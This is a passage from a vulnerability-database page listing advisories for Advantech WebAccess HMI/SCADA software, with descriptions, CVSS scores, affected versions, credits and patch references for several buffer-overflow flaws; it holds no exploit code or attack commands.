All the vulnerabilites related to Advantech - WebAccess
var-201902-0946
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess Node. Authentication is not required to exploit this vulnerability.The specific flaw exists within tv_enua.exe, which is accessed through the 0x2711 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of Administrator.
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-19-230" } ] }, "credits": { "_id": null, "data": "Natnael Samson (@NattiSamson)", "sources": [ { "db": "ZDI", "id": "ZDI-19-230" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "ZDI", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "ZDI-19-230", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 0.7, "userInteraction": "NONE", "vectorString": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "ZDI", "id": "ZDI-19-230", "trust": 0.7, "value": "CRITICAL" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-19-230" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess Node. Authentication is not required to exploit this vulnerability.The specific flaw exists within tv_enua.exe, which is accessed through the 0x2711 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of Administrator.", "sources": [ { "db": "ZDI", "id": "ZDI-19-230" } ], "trust": 0.7 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-7879", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-19-230", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-19-230" } ] }, "id": "VAR-201902-0946", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T02:05:48.708000Z", "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-19-230", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2019-02-28T00:00:00", "db": "ZDI", "id": "ZDI-19-230", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2019-05-30T00:00:00", "db": "ZDI", "id": "ZDI-19-230", "ident": null } ] }, "title": { "_id": null, "data": "(0Day) Advantech WebAccess Node tv_enua Stack-based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-19-230" } ], "trust": 0.7 } }
var-201509-0432
Vulnerability from variot
Multiple stack-based buffer overflows in an unspecified DLL file in Advantech WebAccess before 8.0_20150816 allow remote attackers to execute arbitrary code via a crafted file that triggers long string arguments to functions. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech, China. A heap buffer overflow vulnerability exists in Advantech WebAccess. A local attacker could exploit the vulnerability to execute arbitrary code and may also cause a denial of service. Advantech WebAccess is prone to a local stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. Failed exploit attempts will likely cause denial-of-service conditions. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201509-0432", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "8.0" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "advantech", "version": "8.0_20150816" }, { "model": "webaccess", "scope": null, "trust": 0.6, "vendor": "advantech", "version": null }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8" }, { "model": "webaccess 8.0 20150816", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": null }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "8.0" } ], "sources": [ { "db": "IVD", "id": "726d326e-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2015-06219" }, { "db": "BID", "id": "76753" }, { "db": "JVNDB", "id": "JVNDB-2014-008132" }, { "db": "CNNVD", "id": "CNNVD-201509-257" }, { "db": "NVD", "id": "CVE-2014-9202" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-008132" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Ivan Sanchez from Nullcode Team", "sources": [ { "db": "BID", "id": "76753" }, { "db": "CNNVD", "id": "CNNVD-201509-257" } ], "trust": 0.9 }, "cve": "CVE-2014-9202", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "LOCAL", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 6.9, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 3.4, "id": "CVE-2014-9202", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 3.9, "id": "CNVD-2015-06219", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 3.9, "id": "726d326e-2351-11e6-abef-000c29c66e3d", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "MEDIUM", "accessVector": "LOCAL", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 6.9, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 3.4, "id": "VHN-77147", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:L/AC:M/AU:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2014-9202", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2014-9202", "trust": 0.8, "value": "Medium" }, { "author": "CNVD", "id": "CNVD-2015-06219", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201509-257", "trust": 0.6, "value": "MEDIUM" }, { "author": "IVD", "id": "726d326e-2351-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-77147", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "726d326e-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2015-06219" }, { "db": "VULHUB", "id": "VHN-77147" }, { "db": "JVNDB", "id": "JVNDB-2014-008132" }, { "db": "CNNVD", "id": "CNNVD-201509-257" }, { "db": "NVD", "id": "CVE-2014-9202" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Multiple stack-based buffer overflows in an unspecified DLL file in Advantech WebAccess before 8.0_20150816 allow remote attackers to execute arbitrary code via a crafted file that triggers long string arguments to functions. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech, China. A heap buffer overflow vulnerability exists in Advantech WebAccess. A local attacker could exploit the vulnerability to execute arbitrary code and may also cause a denial of service. Advantech WebAccess is prone to a local stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. Failed exploit attempts will likely cause denial-of-service conditions. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment", "sources": [ { "db": "NVD", "id": "CVE-2014-9202" }, { "db": "JVNDB", "id": "JVNDB-2014-008132" }, { "db": "CNVD", "id": "CNVD-2015-06219" }, { "db": "BID", "id": "76753" }, { "db": "IVD", "id": "726d326e-2351-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-77147" } ], "trust": 2.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-9202", "trust": 3.6 }, { "db": "ICS CERT", "id": "ICSA-15-258-04", "trust": 2.8 }, { "db": "BID", "id": "76753", "trust": 1.6 }, { "db": "CNNVD", "id": "CNNVD-201509-257", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2015-06219", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2014-008132", "trust": 0.8 }, { "db": "IVD", "id": "726D326E-2351-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-77147", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "726d326e-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2015-06219" }, { "db": "VULHUB", "id": "VHN-77147" }, { "db": "BID", "id": "76753" }, { "db": "JVNDB", "id": "JVNDB-2014-008132" }, { "db": "CNNVD", "id": "CNNVD-201509-257" }, { "db": "NVD", "id": "CVE-2014-9202" } ] }, "id": "VAR-201509-0432", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "726d326e-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2015-06219" }, { "db": "VULHUB", "id": "VHN-77147" } ], "trust": 1.33470696 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "726d326e-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2015-06219" } ] }, "last_update_date": "2024-11-23T22:01:42.360000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www2.advantech.co.jp/products/gf-1m94v/advantech-webaccess/mod_b975c492-56b3-4eba-8bbb-5b6d3483ee9d.aspx" }, { "title": "Patch for Advantech WebAccess heap buffer overflow vulnerability", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/64469" }, { "title": "Advantech WebAccess Fixes for heap-based buffer overflow vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=57755" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2015-06219" }, { "db": "JVNDB", "id": "JVNDB-2014-008132" }, { "db": "CNNVD", "id": "CNNVD-201509-257" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-119", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-77147" }, { "db": "JVNDB", "id": "JVNDB-2014-008132" }, { "db": "NVD", "id": "CVE-2014-9202" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.8, "url": "https://ics-cert.us-cert.gov/advisories/icsa-15-258-04" }, { "trust": 1.2, "url": "http://www.securityfocus.com/bid/76753" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9202" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-9202" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2015-06219" }, { "db": "VULHUB", "id": "VHN-77147" }, { "db": "BID", "id": "76753" }, { "db": "JVNDB", "id": "JVNDB-2014-008132" }, { "db": "CNNVD", "id": "CNNVD-201509-257" }, { "db": "NVD", "id": "CVE-2014-9202" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "726d326e-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2015-06219" }, { "db": "VULHUB", "id": "VHN-77147" }, { "db": "BID", "id": "76753" }, { "db": "JVNDB", "id": "JVNDB-2014-008132" }, { "db": "CNNVD", "id": "CNNVD-201509-257" }, { "db": "NVD", "id": "CVE-2014-9202" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2015-09-25T00:00:00", "db": "IVD", "id": "726d326e-2351-11e6-abef-000c29c66e3d" }, { "date": "2015-09-25T00:00:00", "db": "CNVD", "id": "CNVD-2015-06219" }, { "date": "2015-09-28T00:00:00", "db": "VULHUB", "id": "VHN-77147" }, { "date": "2015-09-15T00:00:00", "db": "BID", "id": "76753" }, { "date": "2015-09-30T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-008132" }, { "date": "2015-09-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201509-257" }, { "date": "2015-09-28T02:59:00.107000", "db": "NVD", "id": "CVE-2014-9202" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2015-09-25T00:00:00", "db": "CNVD", "id": "CNVD-2015-06219" }, { "date": "2015-09-29T00:00:00", "db": "VULHUB", "id": "VHN-77147" }, { "date": "2015-09-15T00:00:00", "db": "BID", "id": "76753" }, { "date": "2015-09-30T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-008132" }, { "date": "2015-09-28T00:00:00", "db": "CNNVD", "id": "CNNVD-201509-257" }, { "date": "2024-11-21T02:20:23.583000", "db": "NVD", "id": "CVE-2014-9202" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "local", "sources": [ { "db": "BID", "id": "76753" }, { "db": "CNNVD", "id": "CNNVD-201509-257" } ], "trust": 0.9 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Heap Buffer Overflow Vulnerability", "sources": [ { "db": "IVD", "id": "726d326e-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2015-06219" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Buffer overflow", "sources": [ { "db": "IVD", "id": "726d326e-2351-11e6-abef-000c29c66e3d" }, { "db": "CNNVD", "id": "CNNVD-201509-257" } ], "trust": 0.8 } }
var-201404-0541
Vulnerability from variot
Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long NodeName2 argument. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the webvact.ocx ActiveX Control. The control does not check the length of an attacker-supplied NodeName2 string before copying it into a fixed length buffer on the stack. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Advantech WebAccess is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. Failed attempts will likely cause a denial-of-service condition. Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. There is a stack-based buffer overflow vulnerability in Advantech WebAccess 7.1 and earlier versions
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "5.0" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "7.0" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "6.0" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 1.2, "vendor": "advantech", "version": "7.1" }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "7.1" }, { "_id": null, "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "advantech", "version": "7.2" }, { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null }, { "_id": null, "model": null, "scope": "eq", "trust": 0.4, "vendor": "advantech webaccess", "version": "5.0" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.4, "vendor": "advantech webaccess", "version": "6.0" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.4, "vendor": "advantech webaccess", "version": "7.0" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.4, "vendor": "advantech webaccess", "version": "*" }, { "_id": null, "model": "broadwin webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "7.0" } ], "sources": [ { "db": "IVD", "id": "0cd436b2-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "168cdc96-2352-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-14-073" }, { "db": "CNVD", "id": "CNVD-2014-02242" }, { "db": "BID", "id": "66725" }, { "db": "JVNDB", "id": "JVNDB-2014-001977" }, { "db": "CNNVD", "id": "CNNVD-201404-172" }, { "db": "NVD", "id": "CVE-2014-0766" } ] }, "configurations": { "_id": null, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-001977" } ] }, "credits": { "_id": null, "data": "Tom Gallagher", "sources": [ { "db": "ZDI", "id": "ZDI-14-073" } ], "trust": 0.7 }, "cve": "CVE-2014-0766", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2014-0766", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 2.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2014-02242", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "0cd436b2-1edf-11e6-abef-000c29c66e3d", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "168cdc96-2352-11e6-abef-000c29c66e3d", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-68259", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2014-0766", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2014-0766", "trust": 0.8, "value": "High" }, { "author": "ZDI", "id": "CVE-2014-0766", "trust": 0.7, "value": "HIGH" }, { "author": "CNVD", "id": "CNVD-2014-02242", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201404-172", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "0cd436b2-1edf-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "HIGH" }, { "author": "IVD", "id": "168cdc96-2352-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-68259", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "0cd436b2-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "168cdc96-2352-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-14-073" }, { "db": "CNVD", "id": "CNVD-2014-02242" }, { "db": "VULHUB", "id": "VHN-68259" }, { "db": "JVNDB", "id": "JVNDB-2014-001977" }, { "db": "CNNVD", "id": "CNNVD-201404-172" }, { "db": "NVD", "id": "CVE-2014-0766" } ] }, "description": { "_id": null, "data": "Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long NodeName2 argument. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the webvact.ocx ActiveX Control. The control does not check the length of an attacker-supplied NodeName2 string before copying it into a fixed length buffer on the stack. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Advantech WebAccess is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. Failed attempts will likely cause a denial-of-service condition. \nAdvantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. There is a stack-based buffer overflow vulnerability in Advantech WebAccess 7.1 and earlier versions", "sources": [ { "db": "NVD", "id": "CVE-2014-0766" }, { "db": "JVNDB", "id": "JVNDB-2014-001977" }, { "db": "ZDI", "id": "ZDI-14-073" }, { "db": "CNVD", "id": "CNVD-2014-02242" }, { "db": "BID", "id": "66725" }, { "db": "IVD", "id": "0cd436b2-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "168cdc96-2352-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-68259" } ], "trust": 3.51 }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2014-0766", "trust": 4.5 }, { "db": "ICS CERT", "id": "ICSA-14-079-03", "trust": 3.1 }, { "db": "BID", "id": "66725", "trust": 2.0 }, { "db": "CNNVD", "id": "CNNVD-201404-172", "trust": 1.1 }, { "db": "CNVD", "id": "CNVD-2014-02242", "trust": 1.0 }, { "db": "JVNDB", "id": "JVNDB-2014-001977", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-2011", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-14-073", "trust": 0.7 }, { "db": "OSVDB", "id": "105565", "trust": 0.6 }, { "db": "SECUNIA", "id": "57873", "trust": 0.6 }, { "db": "IVD", "id": "0CD436B2-1EDF-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "IVD", "id": "168CDC96-2352-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "SEEBUG", "id": "SSVID-62177", "trust": 0.1 }, { "db": "VULHUB", "id": "VHN-68259", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "0cd436b2-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "168cdc96-2352-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-14-073" }, { "db": "CNVD", "id": "CNVD-2014-02242" }, { "db": "VULHUB", "id": "VHN-68259" }, { "db": "BID", "id": "66725" }, { "db": "JVNDB", "id": "JVNDB-2014-001977" }, { "db": "CNNVD", "id": "CNNVD-201404-172" }, { "db": "NVD", "id": "CVE-2014-0766" } ] }, "id": "VAR-201404-0541", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "0cd436b2-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "168cdc96-2352-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-02242" }, { "db": "VULHUB", "id": "VHN-68259" } ], "trust": 1.7511770050000002 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 1.0 } ], "sources": [ { "db": "IVD", "id": "0cd436b2-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "168cdc96-2352-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-02242" } ] }, "last_update_date": "2024-11-23T21:45:11.694000Z", "patch": { "_id": null, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.co.jp/products/GF-1M94V/Advantech-WebAccess/mod_B975C492-56B3-4EBA-8BBB-5B6D3483EE9D.aspx" }, { "title": "Downloads ::: WebAccess Software", "trust": 0.8, "url": "http://webaccess.advantech.com/downloads.php?item=software" }, { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 0.7, "url": "https://ics-cert.us-cert.gov/advisories/ICSA-14-079-03" }, { "title": "Advantech WebAccess odeName2 parameter handles patch buffer overflow vulnerability patch", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/44777" }, { "title": 